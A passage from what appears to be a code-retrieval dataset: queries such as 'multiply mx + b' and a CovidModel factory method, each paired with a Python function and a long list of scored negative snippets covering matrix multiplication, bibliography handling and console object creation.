addPublication():\n preloaded = [\n {\"description\": \"bortaS <b>bIr</b> jablu'DI' reH QaQqu' nay'!\"},\n {\"language\": \"en\"},\n {\"country\": \"usa\"}\n ]\n return render_template(\"addPublication.html\", msg=\"\", preloaded=preloaded)", "def get_listu_uredjaja(self):\n lista = sorted(list(self.uredjaji.keys()))\n return lista", "def format_element(bfo, style, separator='; ', elec_loc_field='1'):\n\n urls = []\n coll = bfo.field('960__a')\n\n if '1' in elec_loc_field:\n urls = bfo.fields('8564_')\n\n if '2' in elec_loc_field:\n urls.extend(bfo.fields('85642'))\n\n out = []\n\n if style != \"\":\n style = 'class=\"'+style+'\"'\n\n for url in urls:\n if coll in ['31', '32'] and \\\n url.get('x', '') == 'map':\n # Periodicals\n continue\n\n elif coll in ['74', '75'] and \\\n 'BUL-SA-' not in bfo.field('037__a') and \\\n bfo.field('088__a'):\n # Weekly bulletin\n continue\n\n\n elif url.has_key('u'):\n\n label = url.get('y', '')\n if coll in ['60', '61', '62', '63', '69'] or \\\n coll in ['81', '82', '83', '84', '86','87','88', '89', '115', '117']:\n # Council documents +\n # Photos\n label = escape(url.get('z', ''))\n if label.lower() in ['', 'access to fulltext document', 'access to document', 'full text']:\n label = \"Fulltext\"\n if label.lower() in ['audio files']:\n label = '<img src=http://cdsweb.cern.ch/img/speaker.png border=\"0\">' + \\\n label\n\n\n link = '<a ' + style + ' href=\"' + url['u'] + '\">' + \\\n label + '</a>'\n out.append(link)\n\n if coll == '05':\n file_numbers = bfo.field('927__a')\n for file_number in file_numbers:\n if '-' in file_number or '_' in file_number:\n link = '<a href=\"http://doc.cern.ch/cgi-bin/setlink?base=pauli&amp;categ=&amp;id=\"%s\">Fulltext</a>' % file_number\n out.append(link)\n\n if coll in ['74', '75'] and \\\n 'BUL-SA-' not in bfo.field('037__a') and \\\n bfo.field('088__a'):\n # Weekly bulletin\n link = 'Published in <a href=\"http://bulletin.cern.ch/eng/bulletin.php?bullno=' + \\\n bfo.field('088__a') +'\">CERN weekly bulletin ' + bfo.field('088__a') + '</a>' + \\\n ' (' + bfo.field('260__c') + ')'\n out.append(link)\n\n return separator.join(out)", "def bib_sublist(bibfile_data, val_type):\n sublist = [bibfile for bibfile in bibfile_data if isinstance(bibfile.bib, val_type)]\n return sublist", "def _browse_to_terms(self):\n lang = self.ddnGuiLanguage.get()\n\n filein = filedialog.askopenfilename(\\\n filetypes=[('Paratext Biblical Terms', '.htm'), ], \\\n initialdir=self.BibTerm, \\\n initialfile='', \\\n title=LOCALIZED_TEXT[lang]['Paratext Biblical Terms'], \\\n defaultextension='.htm')\n self.terms_in.set(filein)\n if self.ddnCurProject.get() \\\n and self.dict_in.get() and self.terms_in.get():\n self.btnSaveProject['state'] = 'normal'\n self._change_lang()\n pass", "def get_bibtex(self, arg=None):\n getter = self.get_getter()\n if getter is None:\n return\n if not arg:\n arg = self.visual.ask_user(f\"Search what on the web?\", multichar=True)\n if not arg:\n self.visual.error(\"Nothing entered, aborting.\")\n return\n try:\n res = getter.get_web_bibtex(arg)\n except Exception as ex:\n self.visual.error(\"Failed to complete the query: {}.\".format(ex))\n return\n if not res:\n self.visual.error(\"No data retrieved.\")\n return\n\n reader2 = Reader(self.config)\n read_entries_dict = reader2.read_entry_list(res)\n self.visual.log(\"Retrieved {} entry item(s) from query [{}]\".format(len(read_entries_dict), arg))\n\n # select subset\n if len(read_entries_dict) > 1:\n ids, content = list(zip(*[(e.ID, e.get_discovery_view()) for e in read_entries_dict.values()]))\n _, selected_ids = self.visual.user_multifilter(content, header=Entry.discovery_keys, reference=ids)\n selected_entries = [v for (k, v) in read_entries_dict.items() if k in selected_ids]\n else:\n selected_entries = list(read_entries_dict.values())\n if not selected_entries:\n return\n self.visual.print_entries_contents(selected_entries)\n\n res = self.visual.ask_user(\"Store?\", \"*yes no-but-keep quit\")\n if utils.matches(res, \"yes\"):\n selected_ids = []\n for entry in selected_entries:\n created_entry = self.entry_collection.add_new_entry(entry)\n if created_entry is None:\n self.visual.error(f\"Entry {entry.ID} already exists in the collection!\")\n else:\n selected_ids.append(created_entry.ID)\n elif utils.matches(res, \"no-but-keep\"):\n selected_ids = [x for x in selected_entries]\n elif utils.matches(res, \"quit\"):\n return\n if not selected_ids:\n return\n if self.visual.yes_no(\"Select it?\"):\n self.selector.select_by_id(selected_ids)\n\n # pdf\n what = self.visual.ask_user(\"Pdf?\", \"local url web-search *skip\")\n if utils.matches(what, \"skip\"):\n return\n if utils.matches(what, \"url\"):\n self.get_pdf_from_web()\n return\n if utils.matches(what, \"local\"):\n self.set_local_pdf_path()\n return\n if utils.matches(what, \"web-search\"):\n self.search_web_pdf()", "def show_research(self):\n self.list_research = orm_imp.read_research()\n print(\"========================================================\")\n for row in self.list_research:\n print(\n row[\"date\"], \"|| Produit :\", row['subcat'],\n \"|| Meilleure proposition :\", row['product'], \"| Score :\",\n row['nutriscore'], \"| Lien :\", row['url'],\n \"| Ingrédients :\", row['ingredient'])\n print(\"========================================================\")", "def get_clean_bib(bib):\n d = PyQuery(bib)\n div = d(\"div.csl-right-inline\").html()\n\n # zotero keeps the html escaped in the return value\n div = parser.unescape(div)\n\n return hyperlink_string(div)", "def get_listu_dilucijskih_jedinica(self):\n popis = sorted(list(self.dilucijskeJedinice.keys()))\n return popis", "def __init__(self):\n self.g_sect = []", "def get_bibfiles(folder: str) -> t.List[str]:\n full_pathname = os.path.normpath(os.path.abspath(folder))\n bib_files = []\n for f in os.listdir(full_pathname):\n fullname = os.path.join(full_pathname, f)\n if f.endswith(\".bib\") and os.path.isfile(fullname):\n logging.debug(f'get bibfile \"{f}\" from directory \"{full_pathname}\"')\n bib_files.append(fullname)\n return bib_files", "def list(self):" ]
[ "0.5889567", "0.556562", "0.550952", "0.5432978", "0.535185", "0.52912766", "0.52754295", "0.5218949", "0.5215099", "0.51674855", "0.5162123", "0.51455015", "0.5136601", "0.512709", "0.5073164", "0.5071011", "0.5048508", "0.50347453", "0.503294", "0.50080127", "0.49941462", "0.4989685", "0.4972051", "0.49277106", "0.49242613", "0.49061197", "0.49035367", "0.49002993", "0.48921725", "0.48729238", "0.48662493", "0.4855849", "0.48554122", "0.48414177", "0.48302987", "0.4830171", "0.48235372", "0.48198304", "0.48152983", "0.48090243", "0.4807784", "0.48054036", "0.4793097", "0.47849", "0.47608775", "0.47415623", "0.47291327", "0.47185707", "0.47150356", "0.47147822", "0.4710178", "0.4696916", "0.46941406", "0.4680901", "0.46803892", "0.4676737", "0.46757814", "0.46742636", "0.46694112", "0.46627638", "0.46602455", "0.46525687", "0.4649886", "0.46478537", "0.46421415", "0.462788", "0.4627191", "0.46178472", "0.46094248", "0.46094248", "0.46053982", "0.45907706", "0.45816734", "0.45767748", "0.4574225", "0.4566661", "0.45623016", "0.45606303", "0.455713", "0.45489076", "0.45461923", "0.45405787", "0.45373577", "0.4535609", "0.4534532", "0.4531824", "0.45317477", "0.45268947", "0.45258078", "0.45212606", "0.45197362", "0.45189", "0.45170644", "0.4512629", "0.45124143", "0.45027372", "0.44837812", "0.44812965", "0.44806042", "0.44789615", "0.44781283" ]
0.0
-1
multiply mx + b
def __init__(self, alphabet, m, b): # We're cheating here by not actually having the decryption method use the "inverse" argument transformed = alphabet.affinal(m, b) super(AffineCipher, self).__init__(alphabet, transformed)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def mul(self, a, b):\n return a * b", "def multiply(self, a, b):\n return a * b", "def addmul(a,b):\n return a*b+a*b", "def mul(a,b):\r\n return a*b", "def matmul(a, b):\n raise NotImplementedError", "def mul(x, y):\n return multiply(x, y)", "def _mul(a, b):\n return a * b", "def multiply(x, y):\n\n return x * y", "def mul(a,b):\n return [a[0]*b[0],a[1]*b[1],a[2]*b[2],1.0]", "def mul(a, b):\n c = Calculator()\n result = c.mul(a, b)\n click.echo('{} * {} = {}'.format(a, b, result))", "def mul(A, b):\n return A.from_rep(A.rep.mul(b))", "def mul(Z,X,Y):", "def multiply(a, b):\n return a * b", "def multiply(a, b):\n return a * b", "def multiply(a, b):\n return a * b", "def multiply(a, b):\n return a * b", "def multiply(a, b):\n return a * b", "def __mul__(self,that):\n return self.__opExpand2(that, np.multiply)", "def mul(self, b):\n self.a *= float(b)", "def multiplicacion(x, y):\n return x * y", "def mult(a, b):\n return a * b", "def multiplication(a, b):\n pass", "def multiply(x, y):\n return x * y", "def multiply(x, y):\n return x * y", "def multiply(x, y):\n return x * y", "def multiplication(a, b):\n return a * b", "def multiply(a, b):\n return a*b", "def multiply(a,b):\n return a*b", "def mul(x, y):\n return x * y", "def mul(x, y):\n return x * y", "def _mul(*args):\n\treturn functools.reduce(numpy.dot, args)", "def multiplier(self) -> global___Expression:", "def my_matmul(x, y):\n ##\n cmd = getattr(th, \"matmul\")\n x1, x2 = my_cut(x)\n y1, y2 = my_cut(y)\n x2y1 = cmd(x2, y1)\n x1y2 = cmd(x1, y2)\n x2y2 = cmd(x2, y2)\n ret = (x2y1 + x1y2) % int24field * int24field + x2y2\n ret = int48module(ret)\n return ret", "def f(m, x, b):\n return m*x + b", "def my_mul(x, y):\n ##\n cmd = getattr(th, \"mul\")\n x1, x2 = my_cut(x)\n y1, y2 = my_cut(y)\n x2y1 = cmd(x2, y1)\n x1y2 = cmd(x1, y2)\n x2y2 = cmd(x2, y2)\n return int48module((x2y1 + x1y2) % int24field * int24field + x2y2)", "def matrix_mult(m1, m2):\n pass", "def __mul__(self,a):\n return Vector(self.x*a,self.y*a)\n pass", "def __mul__(self, othertr):\n res = self.dot(othertr)\n return res", "def lazy_matrix_mul(m_a, m_b):\n return np.dot(m_a, m_b)", "def multiply(first, second):\n return first * second", "def mul(a: Decimal, b: Decimal) -> Decimal:\n return a * b", "def multiplies(x, y):\n x[:] *= y[:]\n return x", "def multiply(x, y):\n result = x * y\n return result", "def product(a, b):\n return a * b", "def multiply(self, b):\n assert(self.Dimension == b.Dimension)\n p = []\n for meb in b.Elements:\n for mea in self.Elements:\n if mea.j == meb.i:\n temp = mea.val * meb.val\n temp = MatrixElement(mea.i, meb.j, temp)\n p.append(temp)\n p = SparseMatrix(len(p), p)\n #print(p)\n return p", "def matmul(x, y):\n return np.matmul(x, y)", "def mul_inplace(a, b):", "def matMul(a, b):\n sa=matShape(a)\n sb=matShape(b)\n if sa[1]!=sb[0]: raise ValueError\n ret=matZeros((sa[0],sb[1]))\n for i in range(sa[0]):\n for j in range(sb[1]):\n val=0.0\n for k in range(sa[1]):\n val+=matGet(a,i,k)*matGet(b,k,j)\n matSet(ret,i,j,val)\n return ret", "def mul(self, a: 'PFElement', b: 'PFElement') -> 'PFElement':\n return self(self._pf_mul(a.value, b.value, self.multiplicative_group))", "def multiply(t):\n return mul(*t)", "def __mul__(self,l):\r\n\t\t\r\n\t\t# multiply\r\n\t\tm = self.multiply(l)\r\n\t\t\r\n\t\treturn m", "def multiply(lhs, rhs):\n return _make.multiply(lhs, rhs)", "def __mul__(self, o): \n return MoebGen(self._a * o.a + self._b * o.c, self._a * o.b + self._b * o.d, \n self._c * o.a + self._d * o.c, self._c * o.b + self._d * o.d)", "def __mul__(self, A):\n pass", "def multiply(self, layer):\n pass", "def __mul__(self, other):\r\n return self.prod(other)", "def mul(self):\n a = self.pop()\n b = self.pop()\n c= a*b\n self.push(c)", "def lin(x, m, b):\n return m*x + b", "def __matmul__(self, q: np.ndarray) -> np.ndarray:\n return self.product(q)", "def __matmul__(self, B):\n m, n = self.shape\n n_, r = B.shape\n assert n == n_, (\"Cannot multiply shapes \"\n \"({}, {}) and ({}, {})\".format(m, n, n_, r))\n mul_ = dict()\n # compute A_ik = sum_j A_ij*B_jk\n for i in range(m):\n for k in range(r):\n prod = mpfr(0)\n for j in range(n):\n prod += self[i, j] * B[j, k]\n mul_[i, k] = prod\n return MPMatrix((m, r), mul_)", "def __mul__(self,y): \n\n # BZO mulitplication\n if type(y)==type(self):\n Out = self._CreateSameType()\n \n for Ind1 in self.IndList():\n Obj1=self[Ind1]\n for Ind2 in y.IndList():\n Obj2=y[Ind2]\n \n Ind3 = tuple(add(Ind1,Ind2))\n \n Out[Ind3] += Obj1*Obj2\n \n # Scalar multiplicatin\n else:\n\n Out = self._CreateSameType()\n\n Out.SetLists(self.IndList(),[y*x for x in self.__ObjList])\n\n # Multiplication with item of its own type\n \n \n \n \n \n return Out", "def __mul__(self,m):\n if type(m) != Matrix:\n raise TypeError('The second argument is not a matrix lol')\n if self.ncols != m.nrows:\n raise ValueError('matrix dot argument has incorrect number of rows')\n new = Matrix(self.nrows,m.ncols)\n columns = m.getCols()\n rowindex = 0\n colindex = 0 \n for row in self.matrix:\n colindex = 0 \n for col in columns:\n summ = 0\n for i,j in zip(row,col):\n summ+= i*j \n new.matrix[rowindex][colindex] = summ\n print new.matrix\n colindex += 1 \n rowindex+=1\n return new", "def multiply(n1, n2):\n return n1 * n2", "def lazy_matrix_mul(m_a, m_b):\n m_a = np.array(m_a)\n m_b = np.array(m_b)\n\n return m_a.dot(m_b)", "def dot4(a,b):\n return a[0]*b[0]+a[1]*b[1]+a[2]*b[2]+a[3]*b[3]", "def lazy_matrix_mul(m_a, m_b):\n return (np.matmul(m_a, m_b))", "def product(num_a, num_b):\r\n return num_a*num_b", "def multiply(x, y):\n result = 0\n for _ in range(abs(y)):\n result = add(result, x)\n return -result if y < 0 else result", "def __mul__(self, b):\n try:\n b = float(b)\n return Vector(self.x * b, self.y * b)\n except ValueError:\n raise ValueError(\"Right value must be castable to float, was {}\".format(b))", "def multiplication(self, a, b):\n if not check_arguments(a, b): # check if arguments are numbers\n self.last_result = a * b", "def product(self, x, y):\n return self( x.lift() * y.lift() )", "def multiply(x, y):\n if y == 1: return x\n t = multiply(x, y >> 1)\n t *= 2\n if y & 1:\n t += x\n return t", "def __call__(self, a, b):\n self.a = a\n self.b = b\n return a.data * b.data", "def complex_mul2d(a, b):\n op = partial(torch.einsum, \"bixy,ioxy->boxy\")\n return torch.stack([\n op(a[..., 0], b[..., 0]) - op(a[..., 1], b[..., 1]),\n op(a[..., 1], b[..., 0]) + op(a[..., 0], b[..., 1])\n ],\n dim=-1)", "def ndom_multiply (a, b):\r\n x=ndom_to_decimal(a)\r\n y=ndom_to_decimal(b)\r\n multi=x*y\r\n mab=decimal_to_ndom(multi)\r\n return mab", "def lazy_matrix_mul(m_a, m_b):\n return np.matmul(np.array(m_a), np.array(m_b))", "def complex_mul1d(a, b):\n op = partial(torch.einsum, \"bix,iox->box\")\n return torch.stack([\n op(a[..., 0], b[..., 0]) - op(a[..., 1], b[..., 1]),\n op(a[..., 1], b[..., 0]) + op(a[..., 0], b[..., 1])\n ],\n dim=-1)", "def _multiply(a, b, r):\n p = 0\n while b:\n if b & 1:\n p ^= a\n b >>= 1\n a <<= 1\n if a & 256:\n a ^= r\n return p & (256 - 1)", "def dot(a,b):\n return a[0]*b[0]+a[1]*b[1]+a[2]*b[2]", "def multiply(a: int, b: int) -> int:\n return a * b", "def product1(a, b, c) :\n return a * b * c", "def multiply(a, b):\n columns_of_a = len(a[0])\n lines_of_b = len(b)\n if columns_of_a != lines_of_b:\n # Check matrix dimensions\n print \"Incompatible sizes!\"\n else:\n lines_of_a = len(a)\n columns_of_b = len(b[0])\n #C = []\n #for i in range (lines_of_a):\n # C.append(columns_of_b * [0])\n c = [columns_of_b * [0] for i in range(lines_of_a)]\n for i in range(lines_of_a):\n for j in range(columns_of_b):\n for k in range(lines_of_b):\n c[i][j] += a[i][k] * b[k][j]\n return c", "def multiply(x, y):\n value = 0\n print(x)\n print(y)\n for _ in range(abs(y)):\n value = add(value, x)\n if y < 0:\n value = -value\n return value", "def dot_product(a,b):\n return sum(pairwise_mult(a,b))", "def multiply(x, y):\n result = 0\n for _ in range(abs(y)):\n if y >= 0:\n result = add(result, x)\n else:\n result = add(result, -x)\n return result", "def __imul__(self,that):\n #return self.__opExpand1(that,np.multiply, out=self)\n return self.__opExpand2(that,np.multiply, out=self)", "def fun4(a,b):\n mul=a*b\n return mul", "def mul_numbers(a: int, b: int) -> int:\n return a * b", "def inner(self, a: np.ndarray, b: np.ndarray) -> float:\n return a.T @ (self.mass @ b)", "def dot(a, b):\n return a[0]*b[0] + a[1]*b[1] + a[2]*b[2]", "def box_mul():\n\tu0=r.uniform(0,1)\n\tu1=r.uniform(0,1)\n\tz0 = m.sqrt((-2) * m.log(u0)) * m.cos(2 * m.pi * u1)\n\tz1 = m.sqrt((-2) * m.log(u0)) * m.sin(2 * m.pi * u1)\n\treturn (z0, z1)", "def val_mul(self, a):\n f = self.to_Poly()\n return f.val_mul(a).to_PolyMesh(self.params)", "def __rmul__(self,that):\n return self.__opExpand2(that, np.multiply)", "def recursive_multiply(a, b):\n if len(a) == 2:\n return naive_multiply(a, b)\n\n a11 = a[0:int(len(a) / 2)]\n for index, row in enumerate(a11):\n a11[index] = row[0:int(len(row) / 2)]\n\n a12 = a[0:int(len(a) / 2)]\n for index, row in enumerate(a12):\n a12[index] = row[int(len(a) / 2):len(a)]\n\n a21 = a[int(len(a) / 2):len(a)]\n for index, row in enumerate(a21):\n a21[index] = row[0:int(len(row) / 2)]\n\n a22 = a[int(len(a) / 2):len(a)]\n for index, row in enumerate(a22):\n a22[index] = row[int(len(a) / 2):len(a)]\n\n b11 = b[0:int(len(b) / 2)]\n for index, row in enumerate(b11):\n b11[index] = row[0:int(len(row) / 2)]\n\n b12 = b[0:int(len(b) / 2)]\n for index, row in enumerate(b12):\n b12[index] = row[int(len(b) / 2):len(b)]\n\n b21 = b[int(len(b) / 2):len(b)]\n for index, row in enumerate(b21):\n b21[index] = row[0:int(len(row) / 2)]\n\n b22 = b[int(len(b) / 2):len(b)]\n for index, row in enumerate(b22):\n b22[index] = row[int(len(b) / 2):len(b)]\n\n c11 = matrix_add(recursive_multiply(a11, b11), recursive_multiply(a12, b21)) # C11 = A11*B11 + A12*B21\n c12 = matrix_add(recursive_multiply(a11, b12), recursive_multiply(a12, b22)) # C12 = A11*B12 + A12*B22\n c21 = matrix_add(recursive_multiply(a21, b11), recursive_multiply(a22, b21)) # C21 = A21*B11 + A22*B21\n c22 = matrix_add(recursive_multiply(a21, b12), recursive_multiply(a22, b22)) # C22 = A21*B12 + A22*B22\n\n # Append c12 to c11\n for row_index, row in enumerate(c11):\n for col_index, col in enumerate(c12):\n row.append(c12[row_index][col_index])\n\n # Append c22 to c21\n for row_index, row in enumerate(c21):\n for col_index, col in enumerate(c12):\n row.append(c22[row_index][col_index])\n\n # Append c21 to c11\n for i in c21:\n c11.append(i)\n\n return c11", "def multiply(num1, num2):\n return num1 * num2", "def iloczyn(a, b) -> int:\n return a*b", "def instruction_mult(self, register, a, b):\n if Vm.is_register(a):\n a = self.get_register(a)\n\n if Vm.is_register(b):\n b = self.get_register(b)\n\n result = (a * b) % MAX_INT\n\n self.set_register(register, result)", "def _multiply(self, other):\n raise NotImplementedError(\n \"{} does not support scalar multiplication\".format(type(self)))", "def multiply(num1, num2):\n return num1 * num2", "def multiply(num1, num2):\n return num1 * num2", "def matrix_multiply(self, Am, Bm):\r\n # Section 1: Ensure A & B dimensions are correct for multiplication\r\n rowsA = len(Am)\r\n colsA = len(Am[0])\r\n rowsB = len(Bm)\r\n colsB = len(Bm[0])\r\n if colsA != rowsB:\r\n raise ArithmeticError(\r\n 'Number of A columns must equal number of B rows.')\r\n \r\n # Section 2: Store matrix multiplication in a new matrix\r\n C = self.zeros_matrix(rowsA, colsB)\r\n for i in range(rowsA):\r\n for j in range(colsB):\r\n total = 0\r\n for ii in range(colsA):\r\n total += Am[i][ii] * Bm[ii][j]\r\n C[i][j] = total\r\n \r\n return C" ]
[ "0.7423531", "0.7327661", "0.73207116", "0.7261051", "0.72316414", "0.7190819", "0.71892846", "0.7182553", "0.7133698", "0.71076566", "0.7082618", "0.7080708", "0.7065419", "0.7065419", "0.7065419", "0.7065419", "0.7065419", "0.7064199", "0.70600754", "0.7036849", "0.7033024", "0.7018727", "0.7000787", "0.7000787", "0.7000787", "0.69855976", "0.6958528", "0.6956128", "0.69492805", "0.69492805", "0.6914658", "0.6828035", "0.68266", "0.68237174", "0.6811537", "0.6798854", "0.6791022", "0.67532367", "0.67390037", "0.67328674", "0.6719245", "0.6711404", "0.6708093", "0.6694379", "0.6685654", "0.66725224", "0.6649492", "0.6586256", "0.6578328", "0.65743506", "0.65717965", "0.65702283", "0.65688777", "0.6564086", "0.65573305", "0.65532786", "0.6551839", "0.6540696", "0.6514019", "0.65027505", "0.650133", "0.6493684", "0.6473748", "0.64712954", "0.64656824", "0.64550877", "0.64546084", "0.64437896", "0.6443434", "0.6438388", "0.64174587", "0.64090973", "0.6395859", "0.63936645", "0.63818043", "0.6368792", "0.63662344", "0.6364198", "0.63569933", "0.6349751", "0.6343795", "0.63263166", "0.6323165", "0.6321453", "0.6314445", "0.631375", "0.6305456", "0.63052344", "0.63007766", "0.62921965", "0.62879336", "0.6286482", "0.6285695", "0.62822634", "0.6281268", "0.62791336", "0.62732655", "0.6271101", "0.6269742", "0.6269742", "0.6257278" ]
0.0
-1
Use the args to identify the appropriate model class
def __createCovidModelInstance(self, *args, **kwargs): try: if 'MODEL_TYPE' in kwargs: if kwargs['MODEL_TYPE'] == CovidModel.AGGREGATE_CASES_DECEASED: covidModel = CovidAggregateTotals() self.CovidData = covidModel.getData(*args,**kwargs) self.DataAvailable=self.__isDataAvailable(self.CovidData) return if kwargs['MODEL_TYPE'] == CovidModel.MONTHLY_CASES_DECEASED: covidModel = CovidMonthlyTotals() self.CovidData = covidModel.getData(*args,**kwargs) self.DataAvailable=self.__isDataAvailable(self.CovidData) return if kwargs['MODEL_TYPE'] == CovidModel.PAST_30_DAYS: covidModel = CovidDailyTotals() self.CovidData = covidModel.getData(*args,**kwargs) self.DataAvailable=self.__isDataAvailable(self.CovidData) return if kwargs['MODEL_TYPE'] == CovidModel.MESSAGES: covidModel = CovidMessages() self.CovidData = covidModel.getData(*args,**kwargs) self.DataAvailable=self.__isDataAvailable(self.CovidData) return if kwargs['MODEL_TYPE'] == CovidModel.LOCATIONS: covidModel = CovidLocationInfo() self.CovidData = covidModel.getData(*args,**kwargs) self.DataAvailable=self.__isDataAvailable(self.CovidData) return print ("CovidMessages.__createCovidModelInstance() - did not receive a recognizable model type - no model object instantiated. Args received = ",kwargs) return None except: print ("CovidMessages.__createCovidModelInstance() - unexpected error: ",sys.exc_info()[0]) return None
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def choose_class(self, *args, **kwargs):", "def convert_to_model(self, *args):", "def do_create(self, argv):\n if argv in self.__names:\n new_instance = self.__names[argv]()\n new_instance.save()\n print(\"{}\".format(new_instance.id))\n elif len(argv) is 0:\n print(\"** class name missing **\")\n elif argv is not \"BaseModel\":\n print(\"** class doesn't exist **\")", "def object_cmd(args):\n if len(args) >= 1:\n a = [ args[0], 0 ]\n model_cmd(a)\n else:\n error(\"Usage...\")", "def _class(self, *args):\r\n\r\n if hasattr(args[0], '__mro__'):\r\n #this is a class\r\n return args[0]\r\n else:\r\n #this is an instance\r\n return type(args[0])", "def do_create(self, arg):\n if not arg:\n print('** class name missing **')\n return\n args = arg.split(\" \")\n if args[0] not in self.__classes:\n print(\"** class doesn't exist **\")\n else:\n obj = eval(args[0])()\n obj.save()\n print(obj.id)", "def __init__(self, name, *model_args):\n assert name != None\n self.name = name\n self._models = {}\n self._parent = None #Model instance\n self._loader = None\n self._loaded = True\n for model_arg in model_args:\n m = self.model_class(**model_arg)\n self.add(m)", "def do_create(self, args):\n args = shlex.split(args)\n if not args:\n print(\"** class name missing **\")\n elif not args[0] in name_of_class:\n print(\"** class doesn't exist **\")\n else:\n new_obj = eval(args[0])()\n new_obj.save()\n print(new_obj.id)", "def do_create(self, args):\n if not args:\n print(\"** class name missing **\")\n elif args in HBNBCommand.class_check:\n\n lists = args.split()\n obj = eval(\"{}()\".format(lists[0]))\n obj.save()\n print(obj.id)\n storage.reload()\n\n else:\n print(\"** class doesn't exist **\")", "def use_args(args):\n global DATA_PATH\n global IMAGES_FILE\n global WORKING_DIR\n global OUTPUT_DIR\n global OUTPUT_FILE_NAME\n global OUTPUT_FILE\n global LOAD_INDEXES\n global INDEXES_DIR\n global MODEL\n global JOIN_MODELS\n global MODEL1\n global MODEL2\n global ALL_TOGETHER\n global TRAINED_MODELS\n global TRAINED_MODELS_DIR\n global TRAINED_MODELS_DIR2\n global TRAINED_MODELS_DIRS\n global CROSS_VALIDATION\n global TRAIN_EPOCHS\n global FEATURES\n \n if args.data_path:\n # Change the default path of the images\n DATA_PATH = args.data_path\n IMAGES_FILE = os.path.join(DATA_PATH, IMAGES_FILE_NAME)\n \n if args.working_dir:\n # Change the default path of the working directory\n WORKING_DIR = args.working_dir\n OUTPUT_DIR = WORKING_DIR\n OUTPUT_FILE = os.path.join(OUTPUT_DIR, OUTPUT_FILE_NAME)\n \n if args.output_dir:\n # Change the default path of the output directory\n OUTPUT_DIR = os.path.join(WORKING_DIR, args.output_dir)\n OUTPUT_FILE = os.path.join(OUTPUT_DIR, OUTPUT_FILE_NAME)\n \n if args.output:\n # Change the default name of the output file\n OUTPUT_FILE_NAME = args.output\n OUTPUT_FILE = os.path.join(OUTPUT_DIR, OUTPUT_FILE_NAME)\n \n if args.indexes_dir:\n # Load random and train indexes from file\n LOAD_INDEXES = True\n INDEXES_DIR = args.indexes_dir\n \n if args.model:\n # Select model\n MODEL = args.model\n \n if args.models:\n \n if not args.trained_models_dirs:\n raise Exception(\"Arg. `-M --models` requires arg. \"\n + \"`-T --trained_models_dirs`\")\n \n # Models to combine\n JOIN_MODELS = True\n MODEL1 = args.models[0]\n MODEL2 = args.models[1]\n \n if args.trained_models_dir:\n # Load trained models from file\n TRAINED_MODELS = True\n TRAINED_MODELS_DIR = args.trained_models_dir\n \n if args.trained_models_dirs:\n # Load trained models from file\n TRAINED_MODELS = True\n TRAINED_MODELS_DIR = args.trained_models_dirs[0]\n TRAINED_MODELS_DIR2 = args.trained_models_dirs[1]\n \n if args.all_together:\n # The four models together\n ALL_TOGETHER = True\n TRAINED_MODELS_DIRS = args.all_together\n \n if args.cross_validation:\n # Activate cross_validation\n CROSS_VALIDATION = True\n \n if args.train_epochs:\n # Change the default number of train epochs\n TRAIN_EPOCHS = args.train_epochs\n \n if args.features:\n # Nuber of best features to use\n FEATURES = args.features", "def get_SrcClass(args):\n return Reactome(args)", "def modelClass(self):\n raise NotImplementedError", "def do_create(self, *args):\n \"\"\" args without commas created a tuple of 1, so I created a list with\n the tuple being split by spaces \"\"\"\n args = [ele for ele in args[0].split(' ')]\n if args[0] == '':\n print(\"** class name missing **\")\n return\n if args[0] not in self.list_classes:\n print(\"** class doesn't exist **\")\n return\n newinstance = eval(\"{}()\".format(args[0]))\n newinstance.save()\n print(newinstance.id)", "def do_create(self, args):\n args = shlex.split(args)\n if len(args) == 0:\n print(\"** class name missing **\")\n return False\n if args[0] in classes:\n instance = eval(args[0])()\n else:\n print(\"** class doesn't exist **\")\n return False\n print(instance.id)\n instance.save()", "def __init__(self, *args, **kwargs):\n if (args and type(args) is dict):\n BaseModel.__init__(self, args[0])\n else:\n BaseModel.__init__(self)", "def __init__(self, model: str, **kwargs):\n super().__init__(model=model)", "def get_model(*args):\n return Model()", "def do_create(self, arg):\n\n args = shlex.split(arg)\n if len(args) == 0:\n print(\"** class name missing **\")\n\n elif args[0] in models.classes:\n new_instance = models.classes[args[0]]()\n print(new_instance.id)\n \"\"\"saves it (to the JSON file) \"\"\"\n models.storage.save()\n\n else:\n print(\"** class doesn't exist **\")", "def _build_model(self, **kwargs):\n pass", "def build_model(cls, args, task):\n raise NotImplementedError(\"Model must implement the build_model method\")", "def prepare_model(self, **kwargs):\n pass", "def do_create(self, arg):\n args = shlex.split(arg)\n if len(args) == 0:\n print(\"** class name missing **\")\n return False\n if args[0] in class_type:\n new_inst = class_type[args[0]]()\n else:\n print(\"** class doesn't exist **\")\n return False\n print(new_inst.id)\n new_inst.save()", "def default(self, arg):\n args = arg.split('.')\n stored_objects = models.storage.all()\n if len(args) == 2:\n if args[0] in models.classes:\n self.get_func(args[0], args[1], stored_objects)\n else:\n print(\"** class doesn't exist **\")\n else:\n super().default(arg)", "def do_create(self, args):\n args = args.split()\n l = len(args)\n if l < 1:\n print(\"** class name missing **\")\n else:\n if args[0] in HBNBCommand.valid_classes.keys():\n if l == 1:\n new_obj = HBNBCommand.valid_classes[args[0]]()\n else:\n result = self.__create_help(args[1:])\n if result is None:\n print(\"** Object fails **\")\n return\n new_obj = HBNBCommand.valid_classes[args[0]](**result)\n print(new_obj.id)\n new_obj.save()\n else:\n print(\"** class doesn't exist **\")", "def do_create(self, arg):\n if not arg:\n print(\"** class name missing **\")\n return\n if arg not in HBNBCommand.class_list:\n print(\"** class doesn't exist **\")\n return\n obj = eval(arg + \"()\")\n obj.save()\n print(obj.id)", "def __init__(self, source, target, model_cls):\n self.model_cls = model_cls\n super().__init__(source, target)", "def do_create(self, arg):\n args = arg.split()\n if len(args) == 0:\n print(\"** class name missing **\")\n return\n if args[0] in self.class_dict:\n new = self.class_dict.get(args[0])()\n storage.save()\n print(new.id)\n else:\n print(\"** class doesn't exist **\")", "def __init__(self, **kwargs):\n super(Model, self).__init__(**kwargs)", "def do_update(self, args):\n args = shlex.split(args)\n if len(args) == 0:\n print(\"** class name missing **\")\n return False\n elif args[0] in classes:\n if len(args) > 1:\n k = args[0] + \".\" + args[1]\n if k in models.storage.all():\n if len(args) > 2:\n if len(args) > 3:\n try:\n if isinstance(args[2], datetime) is True:\n pass\n if args[0] in classes:\n if isinstance(args[2], ints) is True:\n args[3] = int(args[3])\n elif isinstance(args[2], floats) is 